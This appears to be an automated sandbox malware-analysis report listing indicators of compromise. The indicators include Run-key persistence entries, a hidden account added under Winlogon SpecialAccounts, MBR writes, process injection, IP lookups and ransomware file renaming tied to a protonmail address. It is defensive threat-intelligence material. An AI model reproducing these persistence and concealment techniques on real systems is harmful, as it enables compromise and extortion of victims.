    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""16.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runtaskhostw.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"taskhostw.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce13.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnceRegAsm.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs"3.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe"juppp.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\5JZXTPFPDZ = "C:\\Program Files (x86)\\Zfx4lo\\helpqrqlwhj.exe"mstsc.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""16.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe"reg.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce3.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ltjqiq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Iarxckfisb\\hmwmcj.exe\""hmwmcj.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulvetim = "C:\\Users\\Admin\\Singul\\Hyperir.exe"RegAsm.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\16.exe = "C:\\Windows\\System32\\16.exe"16.exe
    Key created\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Runcmmon32.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\CpSnJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CpSnJ\\CpSnJ.exe"MSBuild.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    wyfdggaa.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAwyfdggaa.exe
  • Drops desktop.ini file(s)
    16.exeIEXPLORE.EXE

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Favorites\desktop.ini16.exe
    File opened for modificationC:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini16.exe
    File opened for modificationC:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini16.exe
    File opened for modificationC:\Users\Public\Desktop\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Contacts\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Documents\desktop.ini16.exe
    File opened for modificationC:\Users\Public\Pictures\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8DDKLDOL\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Favorites\Links\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RKGIF8TT\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Desktop\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Music\desktop.ini16.exe
    File opened for modificationC:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini16.exe
    File opened for modificationC:\Users\Public\Recorded TV\Sample Media\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F6QQJELO\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Searches\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D08RECS3\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M1AZJ0WQ\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Saved Games\desktop.ini16.exe
    File opened for modificationC:\Users\Public\Downloads\desktop.ini16.exe
    File opened for modificationC:\Users\Public\Recorded TV\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Favorites\Links for United States\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.iniIEXPLORE.EXE
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Downloads\desktop.ini16.exe
    File opened for modificationC:\Program Files (x86)\desktop.ini16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI16.exe
    File opened for modificationC:\Users\Admin\Pictures\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\Videos\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AT22T7OH\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\F6O5NPVK\desktop.ini16.exe
    File opened for modificationC:\Users\Public\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXBH52U7\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini16.exe
    File opened for modificationC:\Users\Public\Libraries\desktop.ini16.exe
    File opened for modificationC:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini16.exe
    File opened for modificationC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini16.exe
    File opened for modificationC:\Users\Public\Pictures\Sample Pictures\desktop.ini16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini16.exe
  • Enumerates connected drives
    msiexec.exemsiexec.exeapi.exemsiexec.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)\??\A:msiexec.exe
    File opened (read-only)\??\K:msiexec.exe
    File opened (read-only)\??\Z:msiexec.exe
    File opened (read-only)\??\F:msiexec.exe
    File opened (read-only)\??\A:api.exe
    File opened (read-only)\??\R:api.exe
    File opened (read-only)\??\U:api.exe
    File opened (read-only)\??\V:msiexec.exe
    File opened (read-only)\??\X:msiexec.exe
    File opened (read-only)\??\M:msiexec.exe
    File opened (read-only)\??\Q:msiexec.exe
    File opened (read-only)\??\X:msiexec.exe
    File opened (read-only)\??\I:api.exe
    File opened (read-only)\??\N:api.exe
    File opened (read-only)\??\R:msiexec.exe
    File opened (read-only)\??\I:msiexec.exe
    File opened (read-only)\??\Z:msiexec.exe
    File opened (read-only)\??\M:msiexec.exe
    File opened (read-only)\??\G:msiexec.exe
    File opened (read-only)\??\V:msiexec.exe
    File opened (read-only)\??\B:msiexec.exe
    File opened (read-only)\??\P:msiexec.exe
    File opened (read-only)\??\E:api.exe
    File opened (read-only)\??\T:api.exe
    File opened (read-only)\??\Z:api.exe
    File opened (read-only)\??\P:msiexec.exe
    File opened (read-only)\??\Z:msiexec.exe
    File opened (read-only)\??\B:msiexec.exe
    File opened (read-only)\??\G:msiexec.exe
    File opened (read-only)\??\L:msiexec.exe
    File opened (read-only)\??\W:msiexec.exe
    File opened (read-only)\??\F:api.exe
    File opened (read-only)\??\M:api.exe
    File opened (read-only)\??\W:msiexec.exe
    File opened (read-only)\??\F:msiexec.exe
    File opened (read-only)\??\I:msiexec.exe
    File opened (read-only)\??\W:msiexec.exe
    File opened (read-only)\??\Q:msiexec.exe
    File opened (read-only)\??\J:msiexec.exe
    File opened (read-only)\??\S:msiexec.exe
    File opened (read-only)\??\A:msiexec.exe
    File opened (read-only)\??\L:msiexec.exe
    File opened (read-only)\??\M:msiexec.exe
    File opened (read-only)\??\Q:msiexec.exe
    File opened (read-only)\??\S:msiexec.exe
    File opened (read-only)\??\H:msiexec.exe
    File opened (read-only)\??\O:msiexec.exe
    File opened (read-only)\??\Y:msiexec.exe
    File opened (read-only)\??\G:api.exe
    File opened (read-only)\??\X:api.exe
    File opened (read-only)\??\O:msiexec.exe
    File opened (read-only)\??\F:msiexec.exe
    File opened (read-only)\??\J:msiexec.exe
    File opened (read-only)\??\A:msiexec.exe
    File opened (read-only)\??\K:api.exe
    File opened (read-only)\??\O:api.exe
    File opened (read-only)\??\S:api.exe
    File opened (read-only)\??\X:msiexec.exe
    File opened (read-only)\??\L:api.exe
    File opened (read-only)\??\N:msiexec.exe
    File opened (read-only)\??\H:msiexec.exe
    File opened (read-only)\??\B:msiexec.exe
    File opened (read-only)\??\L:msiexec.exe
    File opened (read-only)\??\N:msiexec.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    27ip-api.com
    97ip-api.com
    115ip-api.com
    205checkip.amazonaws.com
  • Maps connected drives based on registry
    11.exehelpqrqlwhj.exeregsvcojoduf-.exe18.exe

    Description

    Disk information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\011.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enumhelpqrqlwhj.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0helpqrqlwhj.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enumregsvcojoduf-.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0regsvcojoduf-.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum18.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\018.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum11.exe
  • Modifies WinLogon
    update.exeRDPWinst.exe

    TTPs

    Winlogon Helper DLLModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListupdate.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsupdate.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"update.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListupdate.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsupdate.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"update.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"RDPWinst.exe
  • Writes to the Master Boot Record (MBR)
    Setup.exerundll32.exealiens.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exealiens.exeMiniThunderPlatform.exeapi.exe

    Description

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    TTPs

    Bootkit

    Reported IOCs

    descriptioniocprocess
    File opened for modification\??\PhysicalDrive0Setup.exe
    File opened for modification\??\PhysicalDrive0rundll32.exe
    File opened for modification\??\PhysicalDrive0aliens.exe
    File opened for modification\??\PhysicalDrive00B44010BDDEFEFD3.exe
    File opened for modification\??\PhysicalDrive00B44010BDDEFEFD3.exe
    File opened for modification\??\PhysicalDrive0aliens.exe
    File opened for modification\??\PhysicalDrive0MiniThunderPlatform.exe
    File opened for modification\??\PhysicalDrive0api.exe
  • Drops file in System32 directory
    16.exesvchost.exetaskhost.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\System32\16.exe16.exe
    File opened for modificationC:\Windows\System32\asyncreg.logsvchost.exe
    File opened for modificationC:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdbsvchost.exe
    File createdC:\Windows\System32\Info.hta16.exe
    File opened for modificationC:\Windows\System32\dnsrsvlr.logsvchost.exe
    File opened for modificationC:\Windows\system32\CatRoot2\edb.chksvchost.exe
    File opened for modificationC:\Windows\system32\CatRoot2\edb.logsvchost.exe
    File opened for modificationC:\Windows\System32\winmgmts:\localhost\root\CIMV2taskhost.exe
    File opened for modificationC:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdbsvchost.exe
    File opened for modificationC:\Windows\System32\winmgmts:\localhost\taskhost.exe
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    Setup.exealiens.exe19.exe3.exe13.exe20.exe25.exe15.exe23.exe28.exe7.exe3.exe31.exe13.exeStyltendeschris.exeStyltendeschris.exe19.exealiens.exeRegAsm.exe

    Reported IOCs

    pidprocess
    1288Setup.exe
    2952aliens.exe
    300819.exe
    26323.exe
    160413.exe
    313620.exe
    386825.exe
    194415.exe
    374423.exe
    408428.exe
    19007.exe
    42883.exe
    332431.exe
    431213.exe
    1908Styltendeschris.exe
    3760Styltendeschris.exe
    493619.exe
    3760Styltendeschris.exe
    3752aliens.exe
    3808RegAsm.exe
  • Suspicious use of SetThreadContext
    key.exekey.exe2.exe2.exekey.execmmon32.exe18.exeSetup.exerundll32.exemstsc.exe24.exeBTRSetp.exe3.exe13.exe9.exeIconCachenb6h.exeIconCachenb6h.exe30.exeStyltendeschris.exefeeed.exe26.exe11.exe19.exe11.exeIconCachenb6h.exeIconCachenb6h.execmmon32.exehelpqrqlwhj.exe22.exeIconCachenb6h.exeIconCachenb6h.exe23.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeregsvcojoduf-.exeregsvcojoduf-.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1236 set thread context of 6201236key.exekey.exe
    PID 1416 set thread context of 26241416key.exekey.exe
    PID 1076 set thread context of 214810762.exe2.exe
    PID 2148 set thread context of 126821482.exeExplorer.EXE
    PID 2652 set thread context of 30242652key.exekey.exe
    PID 2428 set thread context of 12682428cmmon32.exeExplorer.EXE
    PID 3068 set thread context of 1268306818.exeExplorer.EXE
    PID 1288 set thread context of 32841288Setup.exerundll32.exe
    PID 1288 set thread context of 39481288Setup.exerundll32.exe
    PID 1288 set thread context of 40121288Setup.exerundll32.exe
    PID 4012 set thread context of 31324012rundll32.exerundll32.exe
    PID 3636 set thread context of 12683636mstsc.exeExplorer.EXE
    PID 3832 set thread context of 1552383224.exe24.exe
    PID 3396 set thread context of 39683396BTRSetp.exeBTRSetp.exe
    PID 2632 set thread context of 428826323.exe3.exe
    PID 1604 set thread context of 4312160413.exe13.exe
    PID 2180 set thread context of 470021809.exe9.exe
    PID 3844 set thread context of 15483844IconCachenb6h.exeIconCachenb6h.exe
    PID 1548 set thread context of 12681548IconCachenb6h.exeExplorer.EXE
    PID 948 set thread context of 494894830.exeMSBuild.exe
    PID 1908 set thread context of 37601908Styltendeschris.exeStyltendeschris.exe
    PID 5016 set thread context of 37045016feeed.exeInstallUtil.exe
    PID 3956 set thread context of 4580395626.exe26.exe
    PID 1844 set thread context of 2828184411.exe11.exe
    PID 3008 set thread context of 4936300819.exe19.exe
    PID 2828 set thread context of 1268282811.exeExplorer.EXE
    PID 2828 set thread context of 1268282811.exeExplorer.EXE
    PID 2416 set thread context of 15682416IconCachenb6h.exeIconCachenb6h.exe
    PID 1568 set thread context of 12681568IconCachenb6h.exeExplorer.EXE
    PID 4560 set thread context of 12684560cmmon32.exeExplorer.EXE
    PID 3432 set thread context of 12683432helpqrqlwhj.exeExplorer.EXE
    PID 3552 set thread context of 4800355222.exevbc.exe
    PID 5052 set thread context of 40325052IconCachenb6h.exeIconCachenb6h.exe
    PID 4032 set thread context of 12684032IconCachenb6h.exeExplorer.EXE
    PID 4032 set thread context of 12684032IconCachenb6h.exeExplorer.EXE
    PID 3744 set thread context of 3808374423.exeRegAsm.exe
    PID 4680 set thread context of 24124680IconCachenb6h.exeIconCachenb6h.exe
    PID 2412 set thread context of 12682412IconCachenb6h.exeExplorer.EXE
    PID 2412 set thread context of 12682412IconCachenb6h.exeExplorer.EXE
    PID 5020 set thread context of 35805020IconCachenb6h.exeIconCachenb6h.exe
    PID 3580 set thread context of 12683580IconCachenb6h.exeExplorer.EXE
    PID 3580 set thread context of 12683580IconCachenb6h.exeExplorer.EXE
    PID 3256 set thread context of 44243256IconCachenb6h.exeIconCachenb6h.exe
    PID 4424 set thread context of 12684424IconCachenb6h.exeExplorer.EXE
    PID 2428 set thread context of 12082428cmmon32.exeiexplore.exe
    PID 2428 set thread context of 44362428cmmon32.exeIEXPLORE.EXE
    PID 2428 set thread context of 47162428cmmon32.exeiexplore.exe
    PID 5768 set thread context of 46165768regsvcojoduf-.exeregsvcojoduf-.exe
    PID 4616 set thread context of 12684616regsvcojoduf-.exeExplorer.EXE
    PID 2428 set thread context of 25682428cmmon32.exeIEXPLORE.EXE
  • Drops file in Program Files directory
    16.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api16.exe
    File opened for modificationC:\Program Files\7-Zip\Lang\af.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar16.exe
    File opened for modificationC:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js16.exe
    File createdC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15135_.GIF16.exe
    File opened for modificationC:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\THMBNAIL.PNG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\Java\jre7\bin\jfxmedia.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\NAME.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\OMSMAIN.DLL16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF16.exe
    File opened for modificationC:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\PAPYRUS.INF16.exe
    File opened for modificationC:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png16.exe
    File opened for modificationC:\Program Files\Java\jre7\bin\keytool.exe16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll16.exe
    File createdC:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl.css16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg16.exe
    File createdC:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files\Mozilla Firefox\maintenanceservice.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\MCPS.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\XOCR3.PSP.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui16.exe
    File opened for modificationC:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml16.exe
    File opened for modificationC:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js16.exe
    File createdC:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\en-US.pak.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\DATES.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files\Java\jre7\lib\zi\Asia\Baghdad.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\NewSplit.xsl16.exe
